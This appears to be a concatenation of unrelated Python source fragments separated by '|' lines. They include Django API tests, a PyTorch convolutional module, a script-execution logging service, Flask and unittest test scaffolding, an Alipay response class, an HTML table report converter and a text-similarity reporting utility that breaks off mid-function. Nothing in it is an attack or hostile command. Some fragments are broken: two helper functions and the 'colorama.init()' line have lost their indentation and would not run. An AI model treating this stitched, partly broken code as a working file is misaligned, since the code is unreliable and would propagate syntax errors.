        set_current_tenant(self.tenant.slug)
        new_lecture = Lecture.objects.get(id=response.data['id'])
        for key, value in self.params.items():
            if key != 'speaker':
                self.assertEqual(getattr(new_lecture, key), value)
            else:
                # 'speaker' is a FK: the payload holds the pk, the model the object.
                self.assertEqual(getattr(new_lecture, key).pk, value)

    def test_create_invalid(self):
        # A negative value violates the gt_2 validator -> 400.
        self.params[self.lecture_fields[0].name] = -100
        response = self.client.post(
            self.list_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 400)

    def test_update(self):
        response = self.client.put(
            self.details_view_url, self.params, format='json', HTTP_TENANT_SLUG=self.tenant.slug)
        self.assertEqual(response.status_code, 200)
        set_current_tenant(self.tenant.slug)
        updated_lecture = Lecture.objects.get(id=response.data['id'])
        for key, value in self.params.items():
            if key != 'speaker':
                self.assertEqual(getattr(updated_lecture, key), value)
            else:
                self.assertEqual(getattr(updated_lecture, key).pk, value)
|
import torch
import torch.nn as nn
class ConvParameterizer(nn.Module):
    """Convolutional parameterizer for the DiSENN model.

    Maps a (batch, 3, 64, 64) input to one relevance score per
    (concept, class) pair, mirroring the VAE conceptizer's encoder:
    four strided 4x4 conv layers, two 256-unit FC layers, and a final
    linear head of size num_concepts * num_classes.
    """

    def __init__(self, num_concepts: int, num_classes: int):
        """Build the conv/fc stacks.

        Parameters
        ----------
        num_concepts: int
            Number of concepts for which relevance scores are produced.
        num_classes: int
            Number of classes in the downstream classification task.
        """
        super().__init__()
        channels_in, channels_hidden, kernel, fc_width = 3, 32, 4, 256
        self.num_concepts = num_concepts
        self.num_classes = num_classes

        # Four identical strided conv stages (each halves spatial size).
        conv_layers = []
        previous = channels_in
        for _ in range(4):
            conv_layers.append(
                nn.Conv2d(previous, channels_hidden, kernel, stride=2, padding=1))
            conv_layers.append(nn.ReLU())
            previous = channels_hidden
        self.conv_block = nn.Sequential(*conv_layers)

        self.fc_block = nn.Sequential(
            nn.Linear(channels_hidden * kernel * kernel, fc_width),
            nn.ReLU(),
            nn.Linear(fc_width, fc_width),
            nn.ReLU(),
        )
        # Head producing one score per (concept, class) pair.
        self.concept_class_layer = nn.Linear(fc_width, num_concepts * num_classes)

    def forward(self, x: torch.Tensor):
        """Generate relevance scores as parameters for concepts.

        Parameters
        ----------
        x: torch.Tensor
            input tensor of shape (batch_size, 3, 64, 64)

        Returns
        -------
        parameters: torch.Tensor
            relevance scores of shape (batch_size, num_concepts, num_classes)
        """
        assert len(x.shape) == 4 and x.shape[2] == 64 and x.shape[3] == 64, \
            "input must be of shape (batch_size x 3 x 64 x 64)"
        features = self.conv_block(x)
        flattened = features.reshape(x.shape[0], -1)
        hidden = self.fc_block(flattened)
        scores = self.concept_class_layer(hidden)
        return scores.view(-1, self.num_concepts, self.num_classes)
|
# noinspection PyBroadException
import logging
import os
import re
from string import Template
from execution.execution_service import ExecutionService
from model.model_helper import AccessProhibitedException
from utils import file_utils, audit_utils
from utils.audit_utils import get_audit_name
from utils.collection_utils import get_first_existing
from utils.date_utils import get_current_millis, ms_to_datetime
ENCODING = 'utf8'
OUTPUT_STARTED_MARKER = '>>>>> OUTPUT STARTED <<<<<'
LOGGER = logging.getLogger('script_server.execution.logging')
class ScriptOutputLogger:
    """Writes a script's output stream to a log file on disk.

    Subscribes to an output stream (observer protocol: on_next/on_close)
    and appends every chunk to log_file_path. All file errors are logged
    and swallowed so logging never breaks the script execution itself.
    """

    def __init__(self, log_file_path, output_stream):
        self.opened = False
        self.closed = False
        self.output_stream = output_stream
        self.log_file_path = log_file_path
        self.log_file = None
        self.close_callback = None  # invoked once, after the file is closed

    def start(self):
        """Open the log file and start receiving stream events."""
        self._ensure_file_open()
        self.output_stream.subscribe(self)

    def _ensure_file_open(self):
        if self.opened:
            return

        try:
            self.log_file = open(self.log_file_path, 'wb')
        except Exception:
            # Best effort: a failed open leaves log_file None and __log a no-op.
            LOGGER.exception("Couldn't create a log file")

        self.opened = True

    def __log(self, text):
        if not self.opened:
            # BUG FIX: this is not an exception handler, so use error(), not
            # exception() (which would log a bogus "NoneType: None" traceback).
            LOGGER.error('Attempt to write to not opened logger')
            return
        if not self.log_file:
            return

        try:
            if text is not None:
                self.log_file.write(text.encode(ENCODING))
                self.log_file.flush()
        except Exception:
            LOGGER.exception("Couldn't write to the log file")

    def _close(self):
        try:
            if self.log_file:
                self.log_file.close()
        except Exception:
            LOGGER.exception("Couldn't close the log file")

        self.closed = True
        if self.close_callback:
            self.close_callback()

    def on_next(self, output):
        """Stream observer callback: a new chunk of script output arrived."""
        self.__log(output)

    def on_close(self):
        """Stream observer callback: the script's output has finished."""
        self._close()

    def write_line(self, text):
        """Write a single metadata line (opens the file on first use)."""
        self._ensure_file_open()
        self.__log(text + os.linesep)

    def set_close_callback(self, callback):
        """Register a one-shot callback fired after the log file is closed."""
        if self.close_callback is not None:
            LOGGER.error('Attempt to override close callback ' + repr(self.close_callback) + ' with ' + repr(callback))
            return

        self.close_callback = callback
        # If the file is already closed, fire immediately so callers never miss it.
        if self.closed:
            self.close_callback()
class HistoryEntry:
    """Plain record describing one logged script execution.

    Every attribute starts as None and is populated later, either by the
    logging service when starting an execution or when parsing a log file.
    """

    def __init__(self):
        self.user_name = self.user_id = None
        self.script_name = self.command = None
        self.start_time = self.exit_code = None
        self.id = None
class ExecutionLoggingService:
    """Stores and retrieves execution logs kept as files in output_folder.

    Each log file starts with 'key:value' metadata lines, followed by
    OUTPUT_STARTED_MARKER and then the raw script output. The service keeps
    an in-memory map of execution id -> filename, refreshed lazily from disk.
    """

    def __init__(self, output_folder, log_name_creator, authorizer):
        self._output_folder = output_folder
        self._log_name_creator = log_name_creator
        self._authorizer = authorizer  # decides who may read other users' logs
        self._visited_files = set()    # files already scanned (even unparsable ones)
        self._ids_to_file_map = {}     # execution id -> log filename
        self._output_loggers = {}      # execution id -> ScriptOutputLogger
        file_utils.prepare_folder(output_folder)
        self._renew_files_cache()

    def start_logging(self, execution_id,
                      user_name,
                      user_id,
                      script_name,
                      command,
                      output_stream,
                      all_audit_names,
                      start_time_millis=None):
        """Create a log file for an execution and start piping its output.

        Writes the metadata header first, then subscribes to output_stream.
        """
        if start_time_millis is None:
            start_time_millis = get_current_millis()

        log_filename = self._log_name_creator.create_filename(
            execution_id, all_audit_names, script_name, start_time_millis)
        log_file_path = os.path.join(self._output_folder, log_filename)
        # Avoid clobbering an existing file with the same generated name.
        log_file_path = file_utils.create_unique_filename(log_file_path)

        output_logger = ScriptOutputLogger(log_file_path, output_stream)
        output_logger.write_line('id:' + execution_id)
        output_logger.write_line('user_name:' + user_name)
        output_logger.write_line('user_id:' + user_id)
        output_logger.write_line('script:' + script_name)
        output_logger.write_line('start_time:' + str(start_time_millis))
        output_logger.write_line('command:' + command)
        output_logger.write_line(OUTPUT_STARTED_MARKER)
        output_logger.start()

        # create_unique_filename may have changed the name; re-read it.
        log_filename = os.path.basename(log_file_path)
        self._visited_files.add(log_filename)
        self._ids_to_file_map[execution_id] = log_filename
        self._output_loggers[execution_id] = output_logger

    def write_post_execution_info(self, execution_id, exit_code):
        """Schedule appending the exit code once the log file is closed."""
        filename = self._ids_to_file_map.get(execution_id)
        if not filename:
            LOGGER.warning('Failed to find filename for execution ' + execution_id)
            return

        logger = self._output_loggers.get(execution_id)
        if not logger:
            LOGGER.warning('Failed to find logger for execution ' + execution_id)
            return

        log_file_path = os.path.join(self._output_folder, filename)
        # Deferred via callback: the file must be fully written and closed
        # before the metadata header is rewritten with the exit code.
        logger.set_close_callback(lambda: self._write_post_execution_info(log_file_path, exit_code))

    def get_history_entries(self, user_id, *, system_call=False):
        """Return all history entries the given user is allowed to see."""
        self._renew_files_cache()

        result = []

        for file in self._ids_to_file_map.values():
            history_entry = self._extract_history_entry(file)
            if history_entry is not None and self._can_access_entry(history_entry, user_id, system_call):
                result.append(history_entry)

        return result

    def find_history_entry(self, execution_id, user_id):
        """Return the entry for execution_id or None; raises
        AccessProhibitedException when user_id may not access it."""
        self._renew_files_cache()

        file = self._ids_to_file_map.get(execution_id)
        if file is None:
            LOGGER.warning('find_history_entry: file for %s id not found', execution_id)
            return None

        entry = self._extract_history_entry(file)
        if entry is None:
            LOGGER.warning('find_history_entry: cannot parse file for %s', execution_id)
        elif not self._can_access_entry(entry, user_id):
            message = 'User ' + user_id + ' has no access to execution #' + str(execution_id)
            LOGGER.warning('%s. Original user: %s', message, entry.user_id)
            raise AccessProhibitedException(message)

        return entry

    def find_log(self, execution_id):
        """Return the raw script output (text after the marker) or None."""
        self._renew_files_cache()

        file = self._ids_to_file_map.get(execution_id)
        if file is None:
            LOGGER.warning('find_log: file for %s id not found', execution_id)
            return None

        file_content = file_utils.read_file(os.path.join(self._output_folder, file),
                                            keep_newlines=True)
        log = file_content.split(OUTPUT_STARTED_MARKER, 1)[1]
        # Drop the single newline that followed the marker itself.
        return _lstrip_any_linesep(log)

    def _extract_history_entry(self, file):
        """Parse a log file's metadata header into a HistoryEntry (or None)."""
        file_path = os.path.join(self._output_folder, file)
        correct_format, parameters_text = self._read_parameters_text(file_path)
        if not correct_format:
            return None

        parameters = self._parse_history_parameters(parameters_text)
        return self._parameters_to_entry(parameters)

    @staticmethod
    def _read_parameters_text(file_path):
        """Read the header up to OUTPUT_STARTED_MARKER.

        Returns (marker_found, header_text); files without the marker are
        considered foreign and ignored.
        """
        parameters_text = ''

        correct_format = False
        with open(file_path, 'r', encoding=ENCODING) as f:
            for line in f:
                if _rstrip_once(line, '\n') == OUTPUT_STARTED_MARKER:
                    correct_format = True
                    break
                parameters_text += line
        return correct_format, parameters_text

    def _renew_files_cache(self):
        """Sync the id->file map with the folder: drop deleted files, scan new ones."""
        cache = self._ids_to_file_map

        obsolete_ids = []
        for id, file in cache.items():
            path = os.path.join(self._output_folder, file)
            if not os.path.exists(path):
                obsolete_ids.append(id)

        for obsolete_id in obsolete_ids:
            LOGGER.info('Logs for execution #' + obsolete_id + ' were deleted')
            del cache[obsolete_id]

        for file in os.listdir(self._output_folder):
            if not file.lower().endswith('.log'):
                continue

            if file in self._visited_files:
                continue

            self._visited_files.add(file)

            entry = self._extract_history_entry(file)
            if entry is None:
                continue

            cache[entry.id] = file

    @staticmethod
    def _create_log_identifier(audit_name, script_name, start_time):
        # Legacy-style identifier: <script>_<audit>_<yymmdd_HHMMSS>.
        audit_name = file_utils.to_filename(audit_name)

        date_string = ms_to_datetime(start_time).strftime("%y%m%d_%H%M%S")

        script_name = script_name.replace(" ", "_")

        log_identifier = script_name + "_" + audit_name + "_" + date_string
        return log_identifier

    @staticmethod
    def _parse_history_parameters(parameters_text):
        """Parse 'key:value' header lines; lines not matching the pattern are
        treated as continuations of the previous value (multi-line commands)."""
        current_value = None
        current_key = None

        parameters = {}
        for line in parameters_text.splitlines(keepends=True):
            match = re.fullmatch('([\w_]+):(.*\r?\n)', line)
            if not match:
                current_value += line
                continue

            if current_key is not None:
                parameters[current_key] = _rstrip_once(current_value, '\n')

            current_key = match.group(1)
            current_value = match.group(2)

        # Flush the last pending key/value pair.
        if current_key is not None:
            parameters[current_key] = _rstrip_once(current_value, '\n')

        return parameters

    @staticmethod
    def _parameters_to_entry(parameters):
        """Build a HistoryEntry from parsed header parameters ('id' required)."""
        id = parameters.get('id')
        if not id:
            return None

        entry = HistoryEntry()
        entry.id = id
        entry.script_name = parameters.get('script')
        entry.user_name = parameters.get('user_name')
        entry.user_id = parameters.get('user_id')
        entry.command = parameters.get('command')

        exit_code = parameters.get('exit_code')
        if exit_code is not None:
            entry.exit_code = int(exit_code)

        start_time = parameters.get('start_time')
        if start_time:
            entry.start_time = ms_to_datetime(int(start_time))

        return entry

    @staticmethod
    def _write_post_execution_info(log_file_path, exit_code):
        # Rewrites the file, inserting 'exit_code:' as the last header line.
        file_content = file_utils.read_file(log_file_path, keep_newlines=True)

        file_parts = file_content.split(OUTPUT_STARTED_MARKER + os.linesep, 1)
        parameters_text = file_parts[0]

        parameters_text += 'exit_code:' + str(exit_code) + os.linesep

        new_content = parameters_text + OUTPUT_STARTED_MARKER + os.linesep + file_parts[1]
        file_utils.write_file(log_file_path, new_content.encode(ENCODING), byte_content=True)

    def _can_access_entry(self, entry, user_id, system_call=False):
        """Owners, system calls and users with full-history access may read."""
        if entry is None:
            return True

        if entry.user_id == user_id:
            return True

        if system_call:
            return True

        return self._authorizer.has_full_history_access(user_id)
class LogNameCreator:
    """Builds log file names from a configurable template.

    Supported placeholders: ${ID}, ${USERNAME}, ${HOSTNAME}, ${IP},
    ${DATE}, ${AUDIT_NAME}, ${SCRIPT}. Unknown placeholders are left as-is
    (safe_substitute); the result always ends with '.log'.
    """

    def __init__(self, filename_pattern=None, date_format=None) -> None:
        self._date_format = date_format or '%y%m%d_%H%M%S'
        self._filename_template = Template(
            filename_pattern or '${SCRIPT}_${AUDIT_NAME}_${DATE}')

    def create_filename(self, execution_id, all_audit_names, script_name, start_time):
        """Render a sanitized, '.log'-suffixed file name for one execution."""
        substitutions = {
            'ID': execution_id,
            'USERNAME': audit_utils.get_audit_username(all_audit_names),
            'HOSTNAME': get_first_existing(all_audit_names, audit_utils.PROXIED_HOSTNAME, audit_utils.HOSTNAME,
                                           default='unknown-host'),
            'IP': get_first_existing(all_audit_names, audit_utils.PROXIED_IP, audit_utils.IP),
            'DATE': ms_to_datetime(start_time).strftime(self._date_format),
            'AUDIT_NAME': file_utils.to_filename(get_audit_name(all_audit_names)),
            'SCRIPT': script_name,
        }

        name = self._filename_template.safe_substitute(substitutions)
        if not name.lower().endswith('.log'):
            name += '.log'

        # Keep the name shell-friendly and inside the log folder.
        return name.replace(" ", "_").replace("/", "_")
class ExecutionLoggingController:
    """Glues the execution service to the logging service.

    start() registers listeners so every execution start opens a log file
    and every execution finish records the exit code.
    """

    def __init__(self, execution_service: ExecutionService, execution_logging_service):
        self._execution_logging_service = execution_logging_service
        self._execution_service = execution_service

    def start(self):
        """Register start/finish listeners on the execution service."""

        def on_execution_started(execution_id):
            exec_service = self._execution_service
            script_config = exec_service.get_config(execution_id)
            script_name = str(script_config.name)
            audit_name = exec_service.get_audit_name(execution_id)
            owner = exec_service.get_owner(execution_id)
            all_audit_names = exec_service.get_all_audit_names(execution_id)
            output_stream = exec_service.get_anonymized_output_stream(execution_id)
            audit_command = exec_service.get_audit_command(execution_id)

            self._execution_logging_service.start_logging(
                execution_id,
                audit_name,
                owner,
                script_name,
                audit_command,
                output_stream,
                all_audit_names)

        def on_execution_finished(execution_id):
            exit_code = self._execution_service.get_exit_code(execution_id)
            self._execution_logging_service.write_post_execution_info(execution_id, exit_code)

        self._execution_service.add_start_listener(on_execution_started)
        self._execution_service.add_finish_listener(on_execution_finished)
def _rstrip_once(text, char):
if text.endswith(char):
text = text[:-1]
return text
def _lstrip_any_linesep(text):
if text.startswith('\r\n'):
return text[2:]
if text.startswith(os.linesep):
return text[len(os.linesep):]
return text
|
def add_objects(a, b):
    """Print and return the sum of two integers.

    Prints an error message and returns None when either argument is not
    an int. (The old code returned ``print(...)``, i.e. always None, so
    the result could never be used programmatically.)
    """
    # `type(x) is int` keeps the original strictness (bool is rejected).
    if type(a) is int and type(b) is int:
        total = a + b
        print(total)
        return total
    print("Enter integer values")
    return None


add_objects(3, 6)
|
from collections import namedtuple

# Immutable record describing one story and its metadata.
Story = namedtuple('Story', 'id title link hn_link top_comments')
|
from .ecdsa import is_public_pair_valid, public_pair_for_secret_exponent, public_pair_for_x, possible_public_pairs_for_signature, sign, verify
from .ellipticcurve import CurveFp, Point
from .secp256k1 import generator_secp256k1
|
from unittest import TestCase
from flask import Flask
from flask.ctx import AppContext
from flask.testing import FlaskClient
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from src.master.appfactory import AppFactory
from src.db import db
class BaseTest(TestCase):
    """Base test class: boots the app once, recreates the DB per test."""

    @classmethod
    def setUpClass(cls):
        cls.factory: AppFactory = AppFactory()
        cls.app: Flask = cls.factory.up()[0]
        cls.api: Api = cls.factory.api
        cls.app_context: AppContext = cls.app.app_context()
        cls.app_context.push()
        cls.test_client: FlaskClient = cls.app.test_client()
        cls.db: SQLAlchemy = db
        # Remember the statically declared tables so reflected ones can be pruned.
        cls.original_tables = cls.db.metadata.sorted_tables

    @classmethod
    def tearDownClass(cls):
        cls.db.engine.dispose()
        cls.app_context.pop()

    def setUp(self):
        self.db.create_all()

    def tearDown(self):
        self.db.session.remove()
        # Pick up tables created outside the declarative models, then drop all.
        self.db.reflect()
        self.drop_all()

    def url_for(self, resource, **values):
        """Build an absolute URL for *resource* on the test host."""
        adapter = self.app.url_map.bind('localhost:5000')
        return adapter.build(resource.endpoint, values, force_external=True)

    def drop_all(self):
        """Drop every known table; forget reflected ones from the metadata."""
        for table in reversed(self.db.metadata.sorted_tables):
            table.drop(self.db.engine)
            if table not in self.original_tables:
                self.db.metadata.remove(table)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.SchoolCardInfo import SchoolCardInfo
class AlipayCommerceEducateCampuscardQueryResponse(AlipayResponse):
    """Response wrapper for the campus-card query API."""

    def __init__(self):
        super(AlipayCommerceEducateCampuscardQueryResponse, self).__init__()
        self._alipay_card_list = None

    @property
    def alipay_card_list(self):
        return self._alipay_card_list

    @alipay_card_list.setter
    def alipay_card_list(self, value):
        # Accept both ready-made SchoolCardInfo objects and raw dicts.
        if isinstance(value, list):
            self._alipay_card_list = [
                item if isinstance(item, SchoolCardInfo)
                else SchoolCardInfo.from_alipay_dict(item)
                for item in value
            ]

    def parse_response_content(self, response_content):
        response = super(AlipayCommerceEducateCampuscardQueryResponse, self).parse_response_content(response_content)
        if 'alipay_card_list' in response:
            self.alipay_card_list = response['alipay_card_list']
|
import collections
from itertools import groupby
from typing import Iterable, List
from . import abc_pdf
from . import entities
from . import helper
from . import templatemanager
__all__ = [
"Empty",
"PyObjToHtmlConverter"
]
def range_subset(range1, range2):
    """Whether *range1* is a subset of *range2*."""
    if not range1:
        return True  # the empty range is a subset of anything
    if not range2:
        return False  # nothing non-empty fits inside an empty range
    multi_element = len(range1) > 1
    if multi_element and range1.step % range2.step != 0:
        return False  # steps are incompatible
    # Once the steps line up, checking both endpoints suffices.
    return range1.start in range2 and range1[-1] in range2
def get_value_and_quantity(data):
    """Callback for itertools.groupby.

    Turns one ``(value, run_iterator)`` pair into ``(value, run_length)``.
    """
    value, repetitions = data
    return value, sum(1 for _ in repetitions)
def _add_column(ranges, range_, column, value, quantity, empty):
    """Record one grouped cell: the value once, then quantity-1 filler cells."""
    ranges.append(range_)
    column.append(entities.CellInfo(value, quantity))
    column.extend(entities.CellInfo(empty, None) for _ in range(quantity - 1))
def group(data, group_indexes=None, *, empty):
    """Return *data* with vertically repeated cells merged for rowspans.

    data: rectangular table (list of rows).
    group_indexes: column indexes eligible for grouping; defaults to all
        columns except the last.
    empty: sentinel placed in cells covered by a merged cell above them.
    """
    if not data or not data[0]:  # no data, return it unchanged
        return data
    # Determine which columns participate in grouping.
    group_indexes = (
        range(len(data[0])-1)
        if group_indexes is None
        else list(group_indexes)
    )
    # Grouped row-ranges of the previous column constrain the current one.
    prev_ranges = []
    new_data = []  # the function result is accumulated here
    data_len = len(data)
    data = zip(*data)  # transpose so we iterate over columns
    for i, column in enumerate(data):
        acc_column = []  # grouped values of this column
        curr_ranges = []  # row ranges produced for this column
        if i not in group_indexes:
            # Non-grouped column: every cell remains its own 1-row range.
            for j in range(data_len):
                _add_column(
                    curr_ranges, range(j, j + 1),
                    acc_column, column[j], 1, empty
                )
            new_data.append(acc_column)
            prev_ranges = curr_ranges[:]
            continue
        index = 0  # current row position within the column
        for v, n in map(get_value_and_quantity, groupby(column)):
            curr_range = range(index, index + n)
            if (
                not prev_ranges
                or
                any(range_subset(curr_range, r) for r in prev_ranges)
            ):  # the whole run fits inside one parent range
                _add_column(
                    curr_ranges, curr_range,
                    acc_column, v, n,
                    empty
                )
            else:  # split the run into parts that fit the parent ranges
                new_index = index
                last_index = index + n
                # Walk the previous column's ranges and cut the run at each stop.
                for r in prev_ranges:
                    if new_index not in r:
                        continue
                    curr_range = range(new_index, last_index)
                    if range_subset(curr_range, r):
                        temp_value = last_index - new_index
                        _add_column(
                            curr_ranges, curr_range,
                            acc_column, v, temp_value,
                            empty
                        )
                        break
                    else:
                        new_range = range(new_index, r.stop)
                        temp_value = r.stop - new_index
                        _add_column(
                            curr_ranges, new_range,
                            acc_column, v, temp_value,
                            empty
                        )
                        new_index = r.stop
            index += n
        new_data.append(acc_column)
        prev_ranges = curr_ranges[:]
    return list(zip(*new_data))
def to_html(data: List[List[entities.CellInfo]], *, empty):
    """Render grouped table data as HTML ``<tr>``/``<td>`` rows."""
    rows_markup = []
    for row in data:
        cells = ["<tr>"]
        for cell in row:
            # Cells swallowed by a rowspan above render nothing.
            if cell.value == empty:
                continue
            cells.append(
                "<td rowspan='{}'>{}</td>".format(
                    cell.quantity, cell.value
                )
            )
        cells.append("</tr>")
        rows_markup.append("\n".join(cells))
    return "\n".join(rows_markup)
class Empty:
    """Sentinel type marking an 'empty' table cell (covered by a merge)."""
class PyObjToHtmlConverter(abc_pdf.AbstractPyObjToHtmlConverter):
    """Convert data from a report object to str (html-markup)."""

    def __init__(self, template_manager=None):
        template_manager = (
            template_manager or templatemanager.DefaultTemplateManager()
        )
        helper.check_isinstance(
            (template_manager, abc_pdf.AbstractTemplateManager)
        )
        self.template_manager = template_manager

    def convert(self, report: entities.Report) -> str:
        """Render *report* (title, header, grouped body, totals) to HTML."""
        title = self.convert_title(
            report.title, len(report.fields)
        )
        fields = self.convert_fields(
            report.fields
        )
        html_table_data = self.convert_data(
            report.data, report.grouping
        )
        totals = self.convert_totals(
            report.totals, len(report.fields)
        )
        html_table = (
            "<table>"
            + title + fields + html_table_data + totals
            + "</table>"
        )
        return self.template_manager.render(table=html_table)

    def convert_data(self, data, group_indexes=None, empty=Empty()):
        """Group repeated cells and render the table body."""
        grouped_data = group(data, group_indexes, empty=empty)
        html_data = to_html(grouped_data, empty=empty)
        return html_data

    def convert_title(self, title, number_of_fields):
        """Render the title row spanning all columns."""
        return (
            "<tr>"
            + "<th colspan='{}' align='center'> {} </th>".format(
                number_of_fields, title
            )
            + "</tr>"
        )

    def convert_fields(self, fields):
        """Render the header row with one <th> per field."""
        return (
            "<tr>"
            + "".join("<th>{}</th>".format(i) for i in fields)
            + "</tr>"
        )

    def convert_totals(
        self,
        totals_results: List[entities.TotalsResult],
        number_of_fields
    ):
        """Render the totals block: spacer row, titles row, values row.

        Bug fix: the previous implementation prepended cells *before* the
        opening "<tr>" and closed both rows with "</td>", producing
        malformed HTML with the totals columns in reverse order.
        """
        totals_positions = {
            t.totals_info.position: t
            for t in totals_results
        }
        cell_template = "<td>{}</td>"
        title_cells = []
        value_cells = []
        for position in range(number_of_fields):
            t_res = totals_positions.get(position)
            if t_res is None:
                # Columns without totals still get (empty) cells.
                title_cells.append(cell_template.format(""))
                value_cells.append(cell_template.format(""))
            else:
                title_cells.append(cell_template.format(t_res.totals_info.title))
                value_cells.append(cell_template.format(t_res.result))
        totals_title = "<tr>" + "".join(title_cells) + "</tr>"
        totals_value = "<tr>" + "".join(value_cells) + "</tr>"
        empty_line = (
            "<tr>"
            + "<td colspan='{}'></td>".format(number_of_fields)
            + "</tr>"
        )
        return empty_line + totals_title + totals_value
# /***********************************************************************
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Note that these code samples being shared are not official Google
# products and are not formally supported.
# ************************************************************************/
import os
import unittest
import pandas as pd
import app_settings
from csv_decoder import Decoder
from utilities import ViewTypes
from utilities import get_view_name
class AppSettingsTest(unittest.TestCase):
    """Checks for AppSettings column configuration."""

    def test_columns(self):
        settings = app_settings.AppSettings()
        # Default name for the account column.
        self.assertEqual(
            settings.columns['account_column_name'].default,
            'account_name'
        )
        settings.columns['account_column_name'].value = 'Account'
        value_to_default = {
            col.value: col.default for col in settings.columns.values()
        }
        self.assertIn('Account', value_to_default)
class UtilitiesTest(unittest.TestCase):
    """Checks for view-name helpers."""

    def test_types(self):
        view_name = get_view_name(ViewTypes.KEYWORD_MAPPER, '123')
        self.assertEqual(view_name, 'KeywordMapper_123')
class CSVDecoderTest(unittest.TestCase):
    """End-to-end check of the CSV Decoder on a small fixture directory."""

    def test_size(self):
        output_path = Decoder('utf-8', './testdata/dirA', map={
            'A': 'only_column'
        }).run()
        self.assertTrue(os.path.isfile(output_path))
        frame: pd.DataFrame = pd.read_csv(output_path)
        # Exactly one (renamed) column survives the mapping.
        self.assertEqual(len(frame.columns), 1)
        self.assertTrue('only_column' in frame)
        desired_list = ['I', 'a', 'c', 'e', 'g', 'k', 'm']
        self.assertListEqual(sorted(frame['only_column'].values), desired_list)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © by Christof Küstner
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE"
# wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and you
# think this stuff is worth it, you can buy me a beer in return.
# Christof Küstner
# ----------------------------------------------------------------------------
"""
@author: CfK
"""
# =============================================================================
# IMPORT
# =============================================================================
import platform
import colorama
import re
import urllib.parse
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from collections import Counter
# =============================================================================
# CONST
# =============================================================================
IS_WINDOWS = platform.system() == "Windows"
IS_MACOS = platform.system() == "Darwin"
IS_LINUX = platform.system() == "Linux"
if IS_WINDOWS:
colorama.init()
# =============================================================================
# DEFINITION
# =============================================================================
def print_title(app_title, app_author, filler, terminal_size):
    """Print a right-aligned, *filler*-padded application title banner."""
    parts = [
        " ",
        colorama.Style.BRIGHT + app_title + colorama.Style.RESET_ALL,
        " by ",
        colorama.Style.BRIGHT + app_author + colorama.Style.RESET_ALL,
        " " + 3 * filler,
    ]
    banner = "".join(parts)
    print(banner.rjust(terminal_size, filler) + colorama.Style.RESET_ALL)
    print()
def print_colored_status(text, status_color_id=0):
    """Print *text* with a '>>> ' prefix coloured by *status_color_id*."""
    # status to color store
    COLORS = (colorama.Fore.RED + colorama.Style.BRIGHT,
              colorama.Fore.GREEN + colorama.Style.BRIGHT,
              colorama.Fore.YELLOW + colorama.Style.BRIGHT)
    if status_color_id >= len(COLORS):
        # Unknown status ids fall back to plain text.
        print(text)
    elif status_color_id == 0:
        # Status 0: the whole line is coloured.
        print(COLORS[status_color_id] + ">>> " +
              text + colorama.Style.RESET_ALL)
    else:
        # Other statuses: only the '>>> ' prefix is coloured.
        print(COLORS[status_color_id] + ">>> " +
              colorama.Style.RESET_ALL + text)
def get_cache_csv(url):
    """Return the cache file name for *url* (URL fully percent-encoded)."""
    encoded = urllib.parse.quote(url, safe="")
    return "predatory_cache_{}.csv".format(encoded)
def highlight_similarity(hl_words, sentence):
    """Colour every word of *hl_words* that occurs in *sentence*.

    Builds an alternation pattern of the individual words and wraps each
    match in a cyan ANSI colour. All regex metacharacters in the words
    are escaped — the old code only escaped parentheses, so words
    containing '.', '+', '*' etc. matched incorrectly.
    """
    escaped_words = (re.escape(word) for word in hl_words.split(" "))
    re_from = r"(" + r"|".join(escaped_words) + r")"
    re_to = colorama.Fore.LIGHTCYAN_EX + r"\1" + colorama.Style.RESET_ALL
    return re.sub(re_from, re_to, sentence)
def get_jaccard_sim_score(str1, str2):
    """Return the Jaccard similarity of the word sets of two strings.

    Score is |A ∩ B| / |A ∪ B| in [0, 1]. Returns 0.0 when both strings
    contain no words — the old code raised ZeroDivisionError there.
    """
    a = set(str1.split())
    b = set(str2.split())
    intersection = a.intersection(b)
    union_size = len(a) + len(b) - len(intersection)
    if union_size == 0:
        return 0.0
    return float(len(intersection)) / union_size
def get_vectors(*strs):
    """Return token-count vectors, one row per input string.

    NOTE: the old code passed the corpus to the CountVectorizer
    constructor, where it landed in the unrelated `input` parameter;
    the corpus belongs in fit()/transform() only.
    """
    text = list(strs)
    vectorizer = CountVectorizer()
    vectorizer.fit(text)
    return vectorizer.transform(text).toarray()
def get_cosine_sim_score(*strs):
    """Return the pairwise cosine-similarity matrix of the input strings."""
    return cosine_similarity(list(get_vectors(*strs)))
def score_color(score, thresholds):
    """Map a similarity *score* to an ANSI colour by severity band."""
    thr0, thr1, thr2 = thresholds
    if thr0 <= score < thr1:
        return colorama.Fore.YELLOW
    if thr1 <= score < thr2:
        return colorama.Fore.LIGHTRED_EX + \
            colorama.Style.BRIGHT
    # NOTE(review): scores below thr0 also fall through to here and get
    # the most severe colour — confirm that is intended.
    return colorama.Back.RED + colorama.Fore.BLACK
def print_report(report, thresholds):
    """Pretty-print similarity matches for each bibliography entry.

    report: mapping ``bib_key -> {bib_field: (bib_entry, pj_matches)}``
        where ``pj_matches`` holds ``(similarity_score, pj_name, pj_url)``
        tuples.
    thresholds: ascending 3-tuple of score thresholds used for colouring.
    """
    for bib_key, bib_matches in report.items():
        # report bib_key
        print("Similarites found in '{}{}{}':".format(
            colorama.Back.WHITE + colorama.Fore.BLACK,
            bib_key,
            colorama.Style.RESET_ALL
        ))
        for bib_field, (bib_entry, pj_matches) in bib_matches.items():
            # report bib_field
            print(" {} : {}{}{}".format(
                bib_field.rjust(15, " "),
